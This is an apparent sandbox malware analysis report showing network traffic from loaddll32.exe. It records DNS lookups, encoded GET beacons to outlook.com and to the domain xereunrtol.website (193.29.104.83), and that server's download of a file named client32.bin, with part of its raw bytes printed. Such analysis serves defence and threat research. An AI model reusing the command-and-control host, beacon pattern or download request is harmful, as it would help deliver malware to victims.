Oct 8, 2021 06:46:15.556160927 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.556174994 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.556195021 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.556226015 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.556624889 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.556659937 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.556736946 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.556751013 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.556813955 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.557199955 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.557226896 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.557302952 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.557312012 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.557360888 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.557487965 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.557559013 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.557581902 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.557651043 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.558903933 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.558937073 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.559022903 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.559040070 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.559097052 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.559571028 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.559603930 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.559694052 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.559710979 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.559746981 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.559762001 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.587645054 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.587675095 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.587838888 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.587862015 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.587903023 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.587918997 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.588251114 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.588274002 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.588359118 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.588380098 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.588438988 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.588711977 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.588732958 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.588804960 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.588824034 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.588884115 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.589272976 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.589302063 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.589401007 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.589416981 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.589476109 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.589699030 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.589749098 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.589776993 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.589783907 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.589797020 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.589829922 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.589864016 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.598047972 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.598900080 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.598927021 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.598962069 CEST	49832	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.598974943 CEST	443	49832	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.967317104 CEST	49833	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.967356920 CEST	443	49833	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:15.970980883 CEST	49833	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.971806049 CEST	49833	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:15.971818924 CEST	443	49833	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:16.079480886 CEST	443	49833	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:16.079586983 CEST	49833	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:16.087816954 CEST	49833	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:16.087833881 CEST	443	49833	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:16.088403940 CEST	443	49833	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:16.090254068 CEST	49833	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:16.135134935 CEST	443	49833	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:16.148276091 CEST	443	49833	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:16.148351908 CEST	443	49833	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:16.148478985 CEST	443	49833	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:16.148591995 CEST	49833	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:16.148658037 CEST	49833	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:16.148675919 CEST	443	49833	193.29.104.83	192.168.2.3
Oct 8, 2021 06:46:16.148729086 CEST	49833	443	192.168.2.3	193.29.104.83
Oct 8, 2021 06:46:16.148736000 CEST	443	49833	193.29.104.83	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2021 06:45:26.566437006 CEST	51143	53	192.168.2.3	8.8.8.8
Oct 8, 2021 06:45:26.585459948 CEST	53	51143	8.8.8.8	192.168.2.3
Oct 8, 2021 06:45:27.443280935 CEST	56009	53	192.168.2.3	8.8.8.8
Oct 8, 2021 06:45:27.462877035 CEST	53	56009	8.8.8.8	192.168.2.3
Oct 8, 2021 06:45:27.607156992 CEST	59026	53	192.168.2.3	8.8.8.8
Oct 8, 2021 06:45:27.625135899 CEST	53	59026	8.8.8.8	192.168.2.3
Oct 8, 2021 06:45:31.535360098 CEST	52130	53	192.168.2.3	8.8.8.8
Oct 8, 2021 06:45:31.553368092 CEST	53	52130	8.8.8.8	192.168.2.3
Oct 8, 2021 06:45:32.747283936 CEST	55102	53	192.168.2.3	8.8.8.8
Oct 8, 2021 06:45:32.765964985 CEST	53	55102	8.8.8.8	192.168.2.3
Oct 8, 2021 06:45:32.966011047 CEST	56236	53	192.168.2.3	8.8.8.8
Oct 8, 2021 06:45:32.984483004 CEST	53	56236	8.8.8.8	192.168.2.3
Oct 8, 2021 06:45:47.981653929 CEST	50728	53	192.168.2.3	8.8.8.8
Oct 8, 2021 06:45:48.005803108 CEST	53	50728	8.8.8.8	192.168.2.3
Oct 8, 2021 06:45:53.492539883 CEST	64367	53	192.168.2.3	8.8.8.8
Oct 8, 2021 06:45:53.512773037 CEST	53	64367	8.8.8.8	192.168.2.3
Oct 8, 2021 06:46:08.057581902 CEST	51539	53	192.168.2.3	8.8.8.8
Oct 8, 2021 06:46:08.080866098 CEST	53	51539	8.8.8.8	192.168.2.3
Oct 8, 2021 06:46:08.459676027 CEST	55393	53	192.168.2.3	8.8.8.8
Oct 8, 2021 06:46:08.490591049 CEST	53	55393	8.8.8.8	192.168.2.3
Oct 8, 2021 06:46:08.990503073 CEST	50585	53	192.168.2.3	8.8.8.8
Oct 8, 2021 06:46:09.020853043 CEST	53	50585	8.8.8.8	192.168.2.3
Oct 8, 2021 06:46:14.767023087 CEST	63456	53	192.168.2.3	8.8.8.8
Oct 8, 2021 06:46:14.784287930 CEST	53	63456	8.8.8.8	192.168.2.3
Oct 8, 2021 06:46:15.257365942 CEST	58540	53	192.168.2.3	8.8.8.8
Oct 8, 2021 06:46:15.281104088 CEST	53	58540	8.8.8.8	192.168.2.3
Oct 8, 2021 06:46:15.942392111 CEST	55108	53	192.168.2.3	8.8.8.8
Oct 8, 2021 06:46:15.962352991 CEST	53	55108	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 8, 2021 06:45:26.566437006 CEST	192.168.2.3	8.8.8.8	0xb675	Standard query (0)	outlook.com	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:27.443280935 CEST	192.168.2.3	8.8.8.8	0xf717	Standard query (0)	www.outlook.com	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:27.607156992 CEST	192.168.2.3	8.8.8.8	0xf806	Standard query (0)	outlook.office365.com	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:31.535360098 CEST	192.168.2.3	8.8.8.8	0xc2fe	Standard query (0)	outlook.com	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:32.747283936 CEST	192.168.2.3	8.8.8.8	0xd767	Standard query (0)	www.outlook.com	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:32.966011047 CEST	192.168.2.3	8.8.8.8	0xa3ac	Standard query (0)	outlook.office365.com	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:47.981653929 CEST	192.168.2.3	8.8.8.8	0xb5e9	Standard query (0)	zereunrtol.website	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:53.492539883 CEST	192.168.2.3	8.8.8.8	0xb38a	Standard query (0)	zereunrtol.website	A (IP address)	IN (0x0001)
Oct 8, 2021 06:46:08.057581902 CEST	192.168.2.3	8.8.8.8	0x6e0	Standard query (0)	xereunrtol.website	A (IP address)	IN (0x0001)
Oct 8, 2021 06:46:08.459676027 CEST	192.168.2.3	8.8.8.8	0xce86	Standard query (0)	xereunrtol.website	A (IP address)	IN (0x0001)
Oct 8, 2021 06:46:08.990503073 CEST	192.168.2.3	8.8.8.8	0x4b05	Standard query (0)	xereunrtol.website	A (IP address)	IN (0x0001)
Oct 8, 2021 06:46:14.767023087 CEST	192.168.2.3	8.8.8.8	0xe225	Standard query (0)	xereunrtol.website	A (IP address)	IN (0x0001)
Oct 8, 2021 06:46:15.257365942 CEST	192.168.2.3	8.8.8.8	0x5b3f	Standard query (0)	xereunrtol.website	A (IP address)	IN (0x0001)
Oct 8, 2021 06:46:15.942392111 CEST	192.168.2.3	8.8.8.8	0xe0c0	Standard query (0)	xereunrtol.website	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 8, 2021 06:45:26.585459948 CEST	8.8.8.8	192.168.2.3	0xb675	No error (0)	outlook.com		40.97.156.114	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:26.585459948 CEST	8.8.8.8	192.168.2.3	0xb675	No error (0)	outlook.com		40.97.160.2	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:26.585459948 CEST	8.8.8.8	192.168.2.3	0xb675	No error (0)	outlook.com		40.97.128.194	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:26.585459948 CEST	8.8.8.8	192.168.2.3	0xb675	No error (0)	outlook.com		40.97.164.146	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:26.585459948 CEST	8.8.8.8	192.168.2.3	0xb675	No error (0)	outlook.com		40.97.153.146	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:26.585459948 CEST	8.8.8.8	192.168.2.3	0xb675	No error (0)	outlook.com		40.97.116.82	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:26.585459948 CEST	8.8.8.8	192.168.2.3	0xb675	No error (0)	outlook.com		40.97.148.226	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:26.585459948 CEST	8.8.8.8	192.168.2.3	0xb675	No error (0)	outlook.com		40.97.161.50	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:27.462877035 CEST	8.8.8.8	192.168.2.3	0xf717	No error (0)	www.outlook.com	outlook.office365.com		CNAME (Canonical name)	IN (0x0001)
Oct 8, 2021 06:45:27.462877035 CEST	8.8.8.8	192.168.2.3	0xf717	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Oct 8, 2021 06:45:27.462877035 CEST	8.8.8.8	192.168.2.3	0xf717	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Oct 8, 2021 06:45:27.462877035 CEST	8.8.8.8	192.168.2.3	0xf717	No error (0)	outlook.ms-acdc.office.com	FRA-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Oct 8, 2021 06:45:27.462877035 CEST	8.8.8.8	192.168.2.3	0xf717	No error (0)	FRA-efz.ms-acdc.office.com		52.98.208.114	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:27.462877035 CEST	8.8.8.8	192.168.2.3	0xf717	No error (0)	FRA-efz.ms-acdc.office.com		52.97.212.34	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:27.462877035 CEST	8.8.8.8	192.168.2.3	0xf717	No error (0)	FRA-efz.ms-acdc.office.com		52.97.137.98	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:27.625135899 CEST	8.8.8.8	192.168.2.3	0xf806	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Oct 8, 2021 06:45:27.625135899 CEST	8.8.8.8	192.168.2.3	0xf806	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Oct 8, 2021 06:45:27.625135899 CEST	8.8.8.8	192.168.2.3	0xf806	No error (0)	outlook.ms-acdc.office.com	HHN-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Oct 8, 2021 06:45:27.625135899 CEST	8.8.8.8	192.168.2.3	0xf806	No error (0)	HHN-efz.ms-acdc.office.com		52.97.151.18	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:27.625135899 CEST	8.8.8.8	192.168.2.3	0xf806	No error (0)	HHN-efz.ms-acdc.office.com		52.97.147.178	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:27.625135899 CEST	8.8.8.8	192.168.2.3	0xf806	No error (0)	HHN-efz.ms-acdc.office.com		52.97.223.66	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:27.625135899 CEST	8.8.8.8	192.168.2.3	0xf806	No error (0)	HHN-efz.ms-acdc.office.com		52.98.207.210	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:31.553368092 CEST	8.8.8.8	192.168.2.3	0xc2fe	No error (0)	outlook.com		40.97.160.2	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:31.553368092 CEST	8.8.8.8	192.168.2.3	0xc2fe	No error (0)	outlook.com		40.97.128.194	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:31.553368092 CEST	8.8.8.8	192.168.2.3	0xc2fe	No error (0)	outlook.com		40.97.164.146	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:31.553368092 CEST	8.8.8.8	192.168.2.3	0xc2fe	No error (0)	outlook.com		40.97.153.146	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:31.553368092 CEST	8.8.8.8	192.168.2.3	0xc2fe	No error (0)	outlook.com		40.97.116.82	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:31.553368092 CEST	8.8.8.8	192.168.2.3	0xc2fe	No error (0)	outlook.com		40.97.148.226	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:31.553368092 CEST	8.8.8.8	192.168.2.3	0xc2fe	No error (0)	outlook.com		40.97.161.50	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:31.553368092 CEST	8.8.8.8	192.168.2.3	0xc2fe	No error (0)	outlook.com		40.97.156.114	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:32.765964985 CEST	8.8.8.8	192.168.2.3	0xd767	No error (0)	www.outlook.com	outlook.office365.com		CNAME (Canonical name)	IN (0x0001)
Oct 8, 2021 06:45:32.765964985 CEST	8.8.8.8	192.168.2.3	0xd767	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Oct 8, 2021 06:45:32.765964985 CEST	8.8.8.8	192.168.2.3	0xd767	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Oct 8, 2021 06:45:32.765964985 CEST	8.8.8.8	192.168.2.3	0xd767	No error (0)	outlook.ms-acdc.office.com	FRA-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Oct 8, 2021 06:45:32.765964985 CEST	8.8.8.8	192.168.2.3	0xd767	No error (0)	FRA-efz.ms-acdc.office.com		40.101.9.178	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:32.765964985 CEST	8.8.8.8	192.168.2.3	0xd767	No error (0)	FRA-efz.ms-acdc.office.com		52.98.208.66	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:32.765964985 CEST	8.8.8.8	192.168.2.3	0xd767	No error (0)	FRA-efz.ms-acdc.office.com		40.101.124.194	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:32.984483004 CEST	8.8.8.8	192.168.2.3	0xa3ac	No error (0)	outlook.office365.com	outlook.ha.office365.com		CNAME (Canonical name)	IN (0x0001)
Oct 8, 2021 06:45:32.984483004 CEST	8.8.8.8	192.168.2.3	0xa3ac	No error (0)	outlook.ha.office365.com	outlook.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Oct 8, 2021 06:45:32.984483004 CEST	8.8.8.8	192.168.2.3	0xa3ac	No error (0)	outlook.ms-acdc.office.com	HHN-efz.ms-acdc.office.com		CNAME (Canonical name)	IN (0x0001)
Oct 8, 2021 06:45:32.984483004 CEST	8.8.8.8	192.168.2.3	0xa3ac	No error (0)	HHN-efz.ms-acdc.office.com		52.97.178.98	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:32.984483004 CEST	8.8.8.8	192.168.2.3	0xa3ac	No error (0)	HHN-efz.ms-acdc.office.com		52.97.212.242	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:32.984483004 CEST	8.8.8.8	192.168.2.3	0xa3ac	No error (0)	HHN-efz.ms-acdc.office.com		52.97.151.146	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:32.984483004 CEST	8.8.8.8	192.168.2.3	0xa3ac	No error (0)	HHN-efz.ms-acdc.office.com		52.97.162.2	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:48.005803108 CEST	8.8.8.8	192.168.2.3	0xb5e9	Name error (3)	zereunrtol.website	none	none	A (IP address)	IN (0x0001)
Oct 8, 2021 06:45:53.512773037 CEST	8.8.8.8	192.168.2.3	0xb38a	Name error (3)	zereunrtol.website	none	none	A (IP address)	IN (0x0001)
Oct 8, 2021 06:46:08.080866098 CEST	8.8.8.8	192.168.2.3	0x6e0	No error (0)	xereunrtol.website		193.29.104.83	A (IP address)	IN (0x0001)
Oct 8, 2021 06:46:08.490591049 CEST	8.8.8.8	192.168.2.3	0xce86	No error (0)	xereunrtol.website		193.29.104.83	A (IP address)	IN (0x0001)
Oct 8, 2021 06:46:09.020853043 CEST	8.8.8.8	192.168.2.3	0x4b05	No error (0)	xereunrtol.website		193.29.104.83	A (IP address)	IN (0x0001)
Oct 8, 2021 06:46:14.784287930 CEST	8.8.8.8	192.168.2.3	0xe225	No error (0)	xereunrtol.website		193.29.104.83	A (IP address)	IN (0x0001)
Oct 8, 2021 06:46:15.281104088 CEST	8.8.8.8	192.168.2.3	0x5b3f	No error (0)	xereunrtol.website		193.29.104.83	A (IP address)	IN (0x0001)
Oct 8, 2021 06:46:15.962352991 CEST	8.8.8.8	192.168.2.3	0xe0c0	No error (0)	xereunrtol.website		193.29.104.83	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

outlook.com

www.outlook.com

outlook.office365.com

xereunrtol.website

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49754	40.97.156.114	443	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-08 04:45:27 UTC	0	OUT	GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: outlook.com
2021-10-08 04:45:27 UTC	0	IN	HTTP/1.1 301 Moved Permanently Cache-Control: no-cache Pragma: no-cache Location: https://www.outlook.com/pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop Server: Microsoft-IIS/10.0 request-id: c8680f70-99f5-21cf-5d9f-13fc0054f4c1 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-FEServer: CY4PR19CA0027 X-RequestId: 20ffc107-f9be-44d4-acf7-1c3178300e1f MS-CV: cA9oyPWZzyFdnxP8AFT0wQ.0 X-Powered-By: ASP.NET X-FEServer: CY4PR19CA0027 Date: Fri, 08 Oct 2021 04:45:26 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49755	52.98.208.114	443	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-08 04:45:27 UTC	1	OUT	GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: www.outlook.com
2021-10-08 04:45:27 UTC	1	IN	HTTP/1.1 301 Moved Permanently Cache-Control: no-cache Pragma: no-cache Location: https://outlook.office365.com/pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop Server: Microsoft-IIS/10.0 request-id: c507eea6-c1bf-faab-c03a-98e5ad89e4f7 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-FEServer: AS9PR06CA0144 X-RequestId: 123ac631-7653-497b-a35e-a2a6ca739940 MS-CV: pu4Hxb/Bq/rAOpjlrYnk9w.0 X-Powered-By: ASP.NET X-FEServer: AS9PR06CA0144 Date: Fri, 08 Oct 2021 04:45:27 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49832	193.29.104.83	443	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-08 04:46:15 UTC	709	OUT	GET /pojol/Erqz_2Bjz7wow49Bn/_2FYIkv6TVHF/sf1rwNiJ2Y3/yJrhJeNnU2kEjh/nuALEqJJJFMSq4HklSS5m/2rTPjjO5rg9u1lJM/jSBd70o6b_2FFTD/X_2BcSxW23GpW45bdz/qP6WaBi3l/T0VhC50JfgPQOKEf4_2B/z0gbHb1bA3R_2Bj9ls7/dy0ZwparSRsDS8LsskC3_2/FFWZkjDnU/Jgk.jop HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: xereunrtol.website
2021-10-08 04:46:15 UTC	710	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 08 Oct 2021 04:46:15 GMT Content-Type: application/zip Content-Length: 275595 Connection: close X-Powered-By: PHP/5.4.16 Set-Cookie: PHPSESSID=9ikufo440gv5p9besq9m8sq5q0; path=/; domain=.xereunrtol.website Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: public Pragma: no-cache Set-Cookie: lang=en; expires=Sun, 07-Nov-2021 04:46:15 GMT; path=/ Content-Transfer-Encoding: Binary Content-Disposition: attachment; filename=client32.bin
2021-10-08 04:46:15 UTC	710	IN	Data Raw: 38 d7 b5 0a 5c 37 1b 38 32 2e 6a 7e 68 87 9b 6a 2e 86 41 63 b4 f3 c9 63 c2 c3 9d 6e 97 7a f6 4a 31 95 db 3d 01 6e 93 ef f9 b4 91 e8 b2 7a 4f 93 98 42 a4 40 23 d0 97 0a d9 42 74 a1 42 c9 5a fb 3d 93 3b 0c 43 c4 e5 70 66 13 c3 bc 59 82 93 9a cb 5d c1 9a e4 7f 29 32 57 71 1a 5c 05 dd 84 34 c8 73 36 a4 28 2c 17 19 d9 ca 97 e8 92 2f 73 31 fb c3 4a 1a 32 f7 c2 c9 38 00 f4 61 d8 8a 0f 52 af 2b e9 63 ea 42 43 dc 1b 46 02 6a 18 aa 81 61 80 11 4f d2 01 c8 82 58 c0 ee d9 d1 9a 94 03 9b 37 91 aa 04 c0 69 26 9c ed 56 6a c5 cb 4a 16 7f 07 fa c4 f5 f6 ee 8b 92 13 08 50 ff f5 98 47 6f 02 0c e6 90 53 74 6a 74 b2 48 a1 2b 2d 53 ee 13 6a 6b 3b a7 b7 34 b5 fe 47 6e 89 7f 0f 49 28 2b 45 69 9d c9 60 db c1 60 a2 e4 01 8d 53 2f 50 5b 1d 87 8f bb fa 9d 9e ff 38 98 56 13 f5 ac 5b Data Ascii: 8\782.j~hj.AccnzJ1=nzOB@#BtBZ=;CpfY])2Wq\4s6(,/s1J28aR+cBCFjaOX7i&VjJPGoStjtH+-Sjk;4GnI(+Ei``S/P[8V[
2021-10-08 04:46:15 UTC	726	IN	Data Raw: ca e9 82 82 3f 1b 23 b7 16 8b 2a 4f 3f 74 16 10 fd 94 f7 76 83 b3 97 17 4f 24 a1 b4 9a ba d3 6e 77 cc 5d 28 68 09 c5 e9 58 89 0e e1 c6 ac e7 9e 92 17 c6 70 08 0d 77 31 14 ad 5f 91 20 98 28 c4 c1 26 c1 8a a0 eb 07 fe ec 54 5d dc 2b 71 27 6c 03 98 44 f0 a8 e7 65 a7 68 ee 3d 64 73 f9 34 f8 c5 e7 b4 7f 70 01 77 57 aa 01 ba 5d 93 a9 e4 e9 1d 28 2d 1e 4d 4a c4 d1 a9 3d bd 29 b9 6c a5 7f da 6a d7 b6 79 58 ff be c4 3b 8d 8b 25 df bf b6 d7 42 2e 25 50 41 e7 22 98 41 a7 e1 81 fd 35 e3 4d fb f6 9b 3b 1f 25 94 b5 b4 08 18 17 35 0d 38 fc fd 19 06 ea 62 35 3f fe 62 e1 a4 0e a1 73 38 da 63 e3 fa 71 23 e5 b3 0b 33 ff b7 70 9e 55 f9 03 bf 4e 0d bd cb 86 61 62 10 23 d6 01 59 fc 32 0e be e7 39 e2 ef b0 6d 37 ba 03 c2 9d 6c 93 9e ff 0f 1e 13 95 b5 df 60 57 7f 5a 1b 3b 6c 4a Data Ascii: 